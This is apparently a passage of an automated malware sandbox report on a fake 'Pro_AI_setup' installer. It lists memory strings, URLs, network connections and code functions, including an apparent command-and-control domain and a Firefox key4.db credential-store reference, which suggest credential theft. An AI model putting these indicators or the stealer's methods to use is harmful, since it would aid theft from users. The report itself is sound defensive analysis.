Source: mDHwap5GlV.exe, 00000000.00000002.2577048094.0000000008330000.00000002.00000001.00040000.00000003.sdmp String found in binary or memory: https://aka.ms/nativeaot-compatibility
Source: powershell.exe, 00000004.00000002.1921706741.0000000004958000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1921706741.0000000004967000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lBdq
Source: mDHwap5GlV.exe, 00000000.00000002.2568628976.00000000051BD000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org
Source: mDHwap5GlV.exe String found in binary or memory: https://api.ipify.org;Error
Source: pipanel.exe, 00000008.00000003.3201020059.0000000005341000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: pipanel.exe, 00000008.00000003.3149914594.000000000536F000.00000004.00000800.00020000.00000000.sdmp, pipanel.exe, 00000008.00000003.3150677116.0000000005358000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: pipanel.exe, 00000008.00000003.3149914594.000000000536F000.00000004.00000800.00020000.00000000.sdmp, pipanel.exe, 00000008.00000003.3150677116.0000000005358000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: pipanel.exe, 00000008.00000003.3149914594.000000000536F000.00000004.00000800.00020000.00000000.sdmp, pipanel.exe, 00000008.00000003.3150677116.0000000005358000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: pipanel.exe, 00000008.00000003.3201020059.0000000005341000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: pipanel.exe, 00000008.00000003.3149914594.000000000536F000.00000004.00000800.00020000.00000000.sdmp, pipanel.exe, 00000008.00000003.3150677116.0000000005358000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: pipanel.exe, 00000008.00000003.3149914594.000000000536F000.00000004.00000800.00020000.00000000.sdmp, pipanel.exe, 00000008.00000003.3150677116.0000000005358000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: pipanel.exe, 00000008.00000003.3149914594.000000000536F000.00000004.00000800.00020000.00000000.sdmp, pipanel.exe, 00000008.00000003.3150677116.0000000005358000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: mDHwap5GlV.exe, 00000000.00000002.2583710420.0000000009BA0000.00000002.00000001.00040000.00000003.sdmp String found in binary or memory: https://github.com/JamesNK/Newtonsoft.Json
Source: mDHwap5GlV.exe, 00000000.00000002.2586676294.000000000A3E1000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2586356950.000000000A070000.00000002.00000001.00040000.00000003.sdmp String found in binary or memory: https://github.com/dotnet/linker/issues/2392
Source: mDHwap5GlV.exe String found in binary or memory: https://github.com/dotnet/runtime
Source: mDHwap5GlV.exe, 00000000.00000002.2579250660.0000000008DC1000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2577048094.0000000008330000.00000002.00000001.00040000.00000003.sdmp String found in binary or memory: https://github.com/dotnet/runtime/blob/bbc898f3e5678135b242faeb6eefd8b24bf04f3c/src/native/corehost/
Source: mDHwap5GlV.exe, 00000000.00000002.2579250660.0000000008DC1000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2577048094.0000000008330000.00000002.00000001.00040000.00000003.sdmp String found in binary or memory: https://github.com/dotnet/runtime/issues/71847
Source: mDHwap5GlV.exe String found in binary or memory: https://github.com/mono/linker/issues/1416.
Source: mDHwap5GlV.exe String found in binary or memory: https://github.com/mono/linker/issues/1731
Source: mDHwap5GlV.exe String found in binary or memory: https://github.com/mono/linker/issues/1906.
Source: mDHwap5GlV.exe String found in binary or memory: https://github.com/mono/linker/issues/1989
Source: mDHwap5GlV.exe, 00000000.00000002.2577048094.00000000088EA000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2579250660.0000000009371000.00000020.00000001.00040000.00000003.sdmp String found in binary or memory: https://github.com/mono/linker/issues/2025
Source: mDHwap5GlV.exe String found in binary or memory: https://github.com/mono/linker/issues/378
Source: mDHwap5GlV.exe, mDHwap5GlV.exe, 00000000.00000002.2586676294.000000000A3E1000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2586356950.000000000A070000.00000002.00000001.00040000.00000003.sdmp String found in binary or memory: https://github.com/mono/linker/pull/2125.
Source: mDHwap5GlV.exe, 00000000.00000002.2579250660.0000000008DC1000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2577048094.0000000008330000.00000002.00000001.00040000.00000003.sdmp String found in binary or memory: https://github.com/mono/linker/pull/649
Source: pipanel.exe, 00000008.00000003.3201020059.0000000005341000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: mDHwap5GlV.exe String found in binary or memory: https://ipinfo.io/
Source: mDHwap5GlV.exe, 00000000.00000002.2568628976.00000000052CA000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/8.46.123.75/json
Source: mDHwap5GlV.exe, 00000000.00000002.2568628976.00000000052D6000.00000004.00001000.00020000.00000000.sdmp, mDHwap5GlV.exe, 00000000.00000002.2568628976.00000000052CA000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/missingauth
Source: pipanel.exe, 00000008.00000003.3300281713.0000000003281000.00000004.00000020.00020000.00000000.sdmp, pipanel.exe, 00000008.00000002.3301790108.0000000003200000.00000004.00000020.00020000.00000000.sdmp, pipanel.exe, 00000008.00000003.3153999700.000000000328B000.00000004.00000020.00020000.00000000.sdmp, pipanel.exe, 00000008.00000003.3149305764.000000000328B000.00000004.00000020.00020000.00000000.sdmp, pipanel.exe, 00000008.00000002.3302217673.0000000003281000.00000004.00000020.00020000.00000000.sdmp, pipanel.exe, 00000008.00000003.3247774576.0000000003280000.00000004.00000020.00020000.00000000.sdmp, pipanel.exe, 00000008.00000003.3299967549.0000000003200000.00000004.00000020.00020000.00000000.sdmp, pipanel.exe, 00000008.00000003.3150414400.000000000328B000.00000004.00000020.00020000.00000000.sdmp, pipanel.exe, 00000008.00000003.3265221775.0000000003281000.00000004.00000020.00020000.00000000.sdmp, pipanel.exe, 00000008.00000003.3251446229.0000000003280000.00000004.00000020.00020000.00000000.sdmp, pipanel.exe, 00000008.00000003.3289055466.0000000003281000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://seat-tabooz.cyou/
Source: pipanel.exe, 00000008.00000003.3300281713.0000000003281000.00000004.00000020.00020000.00000000.sdmp, pipanel.exe, 00000008.00000002.3302217673.0000000003281000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://seat-tabooz.cyou/_
Source: pipanel.exe, 00000008.00000003.3289021019.0000000003289000.00000004.00000020.00020000.00000000.sdmp, pipanel.exe, 00000008.00000003.3251424268.0000000003287000.00000004.00000020.00020000.00000000.sdmp, pipanel.exe, 00000008.00000003.3299967549.0000000003224000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://seat-tabooz.cyou/api
Source: pipanel.exe, 00000008.00000002.3301790108.0000000003200000.00000004.00000020.00020000.00000000.sdmp, pipanel.exe, 00000008.00000003.3299967549.0000000003200000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://seat-tabooz.cyou/api$
Source: pipanel.exe, 00000008.00000003.3288755840.00000000032A6000.00000004.00000020.00020000.00000000.sdmp, pipanel.exe, 00000008.00000003.3299412345.00000000032A6000.00000004.00000020.00020000.00000000.sdmp, pipanel.exe, 00000008.00000002.3302356926.00000000032A7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://seat-tabooz.cyou/apibu
Source: pipanel.exe, 00000008.00000003.3288755840.00000000032A6000.00000004.00000020.00020000.00000000.sdmp, pipanel.exe, 00000008.00000003.3299412345.00000000032A6000.00000004.00000020.00020000.00000000.sdmp, pipanel.exe, 00000008.00000002.3302356926.00000000032A7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://seat-tabooz.cyou/apig
Source: pipanel.exe, 00000008.00000003.3299412345.00000000032A6000.00000004.00000020.00020000.00000000.sdmp, pipanel.exe, 00000008.00000002.3302356926.00000000032A7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://seat-tabooz.cyou/apis
Source: pipanel.exe, 00000008.00000003.3300281713.0000000003281000.00000004.00000020.00020000.00000000.sdmp, pipanel.exe, 00000008.00000002.3302217673.0000000003281000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://seat-tabooz.cyou/e7
Source: pipanel.exe, 00000008.00000003.3247774576.0000000003280000.00000004.00000020.00020000.00000000.sdmp, pipanel.exe, 00000008.00000003.3265221775.0000000003281000.00000004.00000020.00020000.00000000.sdmp, pipanel.exe, 00000008.00000003.3251446229.0000000003280000.00000004.00000020.00020000.00000000.sdmp, pipanel.exe, 00000008.00000003.3289055466.0000000003281000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://seat-tabooz.cyou/g
Source: pipanel.exe, 00000008.00000003.3247774576.0000000003280000.00000004.00000020.00020000.00000000.sdmp, pipanel.exe, 00000008.00000003.3251446229.0000000003280000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://seat-tabooz.cyou/rG
Source: pipanel.exe, 00000008.00000003.3300281713.0000000003281000.00000004.00000020.00020000.00000000.sdmp, pipanel.exe, 00000008.00000002.3302217673.0000000003281000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://seat-tabooz.cyou/s
Source: pipanel.exe, 00000008.00000002.3301790108.0000000003200000.00000004.00000020.00020000.00000000.sdmp, pipanel.exe, 00000008.00000003.3299967549.0000000003200000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://seat-tabooz.cyou:443/api
Source: pipanel.exe, 00000008.00000002.3301790108.0000000003200000.00000004.00000020.00020000.00000000.sdmp, pipanel.exe, 00000008.00000003.3299967549.0000000003200000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://seat-tabooz.cyou:443/api2o4p.default-release/key4.dbPK
Source: pipanel.exe, 00000008.00000002.3301790108.0000000003200000.00000004.00000020.00020000.00000000.sdmp, pipanel.exe, 00000008.00000003.3299967549.0000000003200000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://seat-tabooz.cyou:443/apiT
Source: pipanel.exe, 00000008.00000003.3153242568.000000000539E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.microsof
Source: pipanel.exe, 00000008.00000003.3200670230.0000000005465000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: pipanel.exe, 00000008.00000003.3200670230.0000000005465000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: pipanel.exe, 00000008.00000003.3153503975.0000000005395000.00000004.00000800.00020000.00000000.sdmp, pipanel.exe, 00000008.00000003.3154237672.0000000005395000.00000004.00000800.00020000.00000000.sdmp, pipanel.exe, 00000008.00000003.3177153641.0000000005395000.00000004.00000800.00020000.00000000.sdmp, pipanel.exe, 00000008.00000003.3177263165.0000000005395000.00000004.00000800.00020000.00000000.sdmp, pipanel.exe, 00000008.00000003.3153242568.000000000539C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: pipanel.exe, 00000008.00000003.3153503975.0000000005370000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: pipanel.exe, 00000008.00000003.3153503975.0000000005395000.00000004.00000800.00020000.00000000.sdmp, pipanel.exe, 00000008.00000003.3154237672.0000000005395000.00000004.00000800.00020000.00000000.sdmp, pipanel.exe, 00000008.00000003.3177153641.0000000005395000.00000004.00000800.00020000.00000000.sdmp, pipanel.exe, 00000008.00000003.3177263165.0000000005395000.00000004.00000800.00020000.00000000.sdmp, pipanel.exe, 00000008.00000003.3153242568.000000000539C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: pipanel.exe, 00000008.00000003.3153503975.0000000005370000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: pipanel.exe, 00000008.00000003.3149914594.000000000536F000.00000004.00000800.00020000.00000000.sdmp, pipanel.exe, 00000008.00000003.3150677116.0000000005358000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: decrypted_app_1.exe, 00000007.00000000.2526968446.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, decrypted_app_1.exe.0.dr String found in binary or memory: https://www.faststone.org/order.htm
Source: decrypted_app_1.exe, 00000007.00000000.2526968446.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, decrypted_app_1.exe.0.dr String found in binary or memory: https://www.faststone.org/order.htmU
Source: pipanel.exe, 00000008.00000003.3149914594.000000000536F000.00000004.00000800.00020000.00000000.sdmp, pipanel.exe, 00000008.00000003.3150677116.0000000005358000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: pipanel.exe, 00000008.00000003.3200670230.0000000005465000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: pipanel.exe, 00000008.00000003.3200670230.0000000005465000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: pipanel.exe, 00000008.00000003.3200670230.0000000005465000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: pipanel.exe, 00000008.00000003.3200670230.0000000005465000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: pipanel.exe, 00000008.00000003.3200670230.0000000005465000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: mDHwap5GlV.exe, 00000000.00000002.2583710420.0000000009BA0000.00000002.00000001.00040000.00000003.sdmp String found in binary or memory: https://www.newtonsoft.com/json
Source: mDHwap5GlV.exe, 00000000.00000002.2583710420.0000000009BA0000.00000002.00000001.00040000.00000003.sdmp String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: mDHwap5GlV.exe, 00000000.00000002.2583710420.0000000009BA0000.00000002.00000001.00040000.00000003.sdmp String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown Network traffic detected: HTTP traffic on port 49924 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49930
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49972
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 49949 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49972 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49930 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49937 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49956 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49962 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49943 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49949
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49937
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49924
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49956
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49943
Source: unknown HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.178.191:443 -> 192.168.2.4:49924 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.178.191:443 -> 192.168.2.4:49930 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.178.191:443 -> 192.168.2.4:49937 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.178.191:443 -> 192.168.2.4:49943 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.178.191:443 -> 192.168.2.4:49949 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.178.191:443 -> 192.168.2.4:49956 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.178.191:443 -> 192.168.2.4:49962 version: TLS 1.2
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_03003924 NtWriteVirtualMemory,NtWriteVirtualMemory, 7_2_03003924
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_0300392B NtWriteVirtualMemory,NtWriteVirtualMemory, 7_2_0300392B
Detected potential crypto function
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Code function: 0_2_00A21920 0_2_00A21920
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Code function: 0_2_00C762E0 0_2_00C762E0
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Code function: 0_2_00A7B280 0_2_00A7B280
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Code function: 0_2_00B2EAD0 0_2_00B2EAD0
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Code function: 0_2_00A26BA0 0_2_00A26BA0
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Code function: 0_2_09AD9EF0 0_2_09AD9EF0
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Code function: 0_2_09B69250 0_2_09B69250
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Code function: 0_2_09F27980 0_2_09F27980
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Code function: 0_2_09F5E8D0 0_2_09F5E8D0
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Code function: 0_2_09F534F0 0_2_09F534F0
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Code function: 0_2_09F1F780 0_2_09F1F780
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Code function: 0_2_09F656D0 0_2_09F656D0
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Code function: 0_2_09F2A940 0_2_09F2A940
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Code function: 0_2_09F3A940 0_2_09F3A940
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Code function: 0_2_09F1D910 0_2_09F1D910
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Code function: 0_2_09F30880 0_2_09F30880
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Code function: 0_2_09F3C850 0_2_09F3C850
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Code function: 0_2_09F40BE0 0_2_09F40BE0
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Code function: 0_2_09F21A30 0_2_09F21A30
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Code function: 0_2_09F5DD30 0_2_09F5DD30
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Code function: 0_2_09F3BCE0 0_2_09F3BCE0
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Code function: 0_2_09F41C30 0_2_09F41C30
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Code function: 0_2_09F40100 0_2_09F40100
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Code function: 0_2_09F4B0E0 0_2_09F4B0E0
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Code function: 0_2_09F0B240 0_2_09F0B240
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Code function: 0_2_09F627F0 0_2_09F627F0
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Code function: 0_2_09F0B710 0_2_09F0B710
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Code function: 0_2_0A3E379B 0_2_0A3E379B
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Code function: 0_2_0A3E3D5D 0_2_0A3E3D5D
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_030113E0 7_2_030113E0
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_03010AE0 7_2_03010AE0
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_0300F000 7_2_0300F000
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_0301D040 7_2_0301D040
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_03007790 7_2_03007790
PE file contains executable resources (Code or Archives)
Source: mDHwap5GlV.exe Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Sample file is different than original file name gathered from version info
Source: mDHwap5GlV.exe Binary or memory string: OriginalFilename vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2619976607.000000000E721000.00000020.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.Registry.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2594641559.000000000CDAA000.00000002.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Private.Uri.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2605844050.000000000D521000.00000020.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Collections.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2607352936.000000000DCF0000.00000002.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Net.Quic.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2605777963.000000000D4D0000.00000002.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Collections.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2594220011.000000000CBE1000.00000020.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Security.Cryptography.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2609096644.000000000DEF0000.00000002.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.CodeDom.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2609096644.000000000DEF0000.00000002.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Management.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2585865823.0000000009D10000.00000002.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Configuration.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2585865823.0000000009D10000.00000002.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Console.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2587143621.000000000A740000.00000002.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenamePro_AI_setup_v_1.03.dllH vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2587143621.000000000A740000.00000002.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameMicrosoft.CSharp.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2592357978.000000000C7E0000.00000002.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Diagnostics.Tracing.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2607545242.000000000DD80000.00000002.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Threading.Thread.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2607545242.000000000DD80000.00000002.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Threading.ThreadPool.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2583710420.0000000009BA0000.00000002.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2582770722.0000000009AB0000.00000002.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Runtime.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2606037613.000000000D5B1000.00000020.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Collections.Concurrent.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2620268309.000000000E7F0000.00000002.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Collections.Specialized.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000000.1668262979.0000000000FF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamemscordaccore.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000000.1668262979.0000000000FF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamePro_AI_setup_v_1.03.dllH vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2593292915.000000000C830000.00000002.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Data.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2593292915.000000000C830000.00000002.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Diagnostics.Contracts.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2593292915.000000000C830000.00000002.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Diagnostics.Debug.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2593292915.000000000C830000.00000002.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Diagnostics.DiagnosticSource.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2594814056.000000000CDF1000.00000020.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Private.Uri.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2593385471.000000000C8A1000.00000020.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Diagnostics.DiagnosticSource.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2610251919.000000000E1E0000.00000002.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Net.ServicePoint.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2610251919.000000000E1E0000.00000002.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Net.Sockets.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2586676294.000000000A3E1000.00000020.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Linq.Expressions.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2583501518.0000000009B20000.00000002.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Net.Primitives.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2586356950.000000000A070000.00000002.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.IO.UnmanagedMemoryStream.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2586356950.000000000A070000.00000002.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.IO.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2586356950.000000000A070000.00000002.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Linq.Expressions.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2605944100.000000000D560000.00000002.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.AppContext.dll@ vs mDHwap5GlV.exe
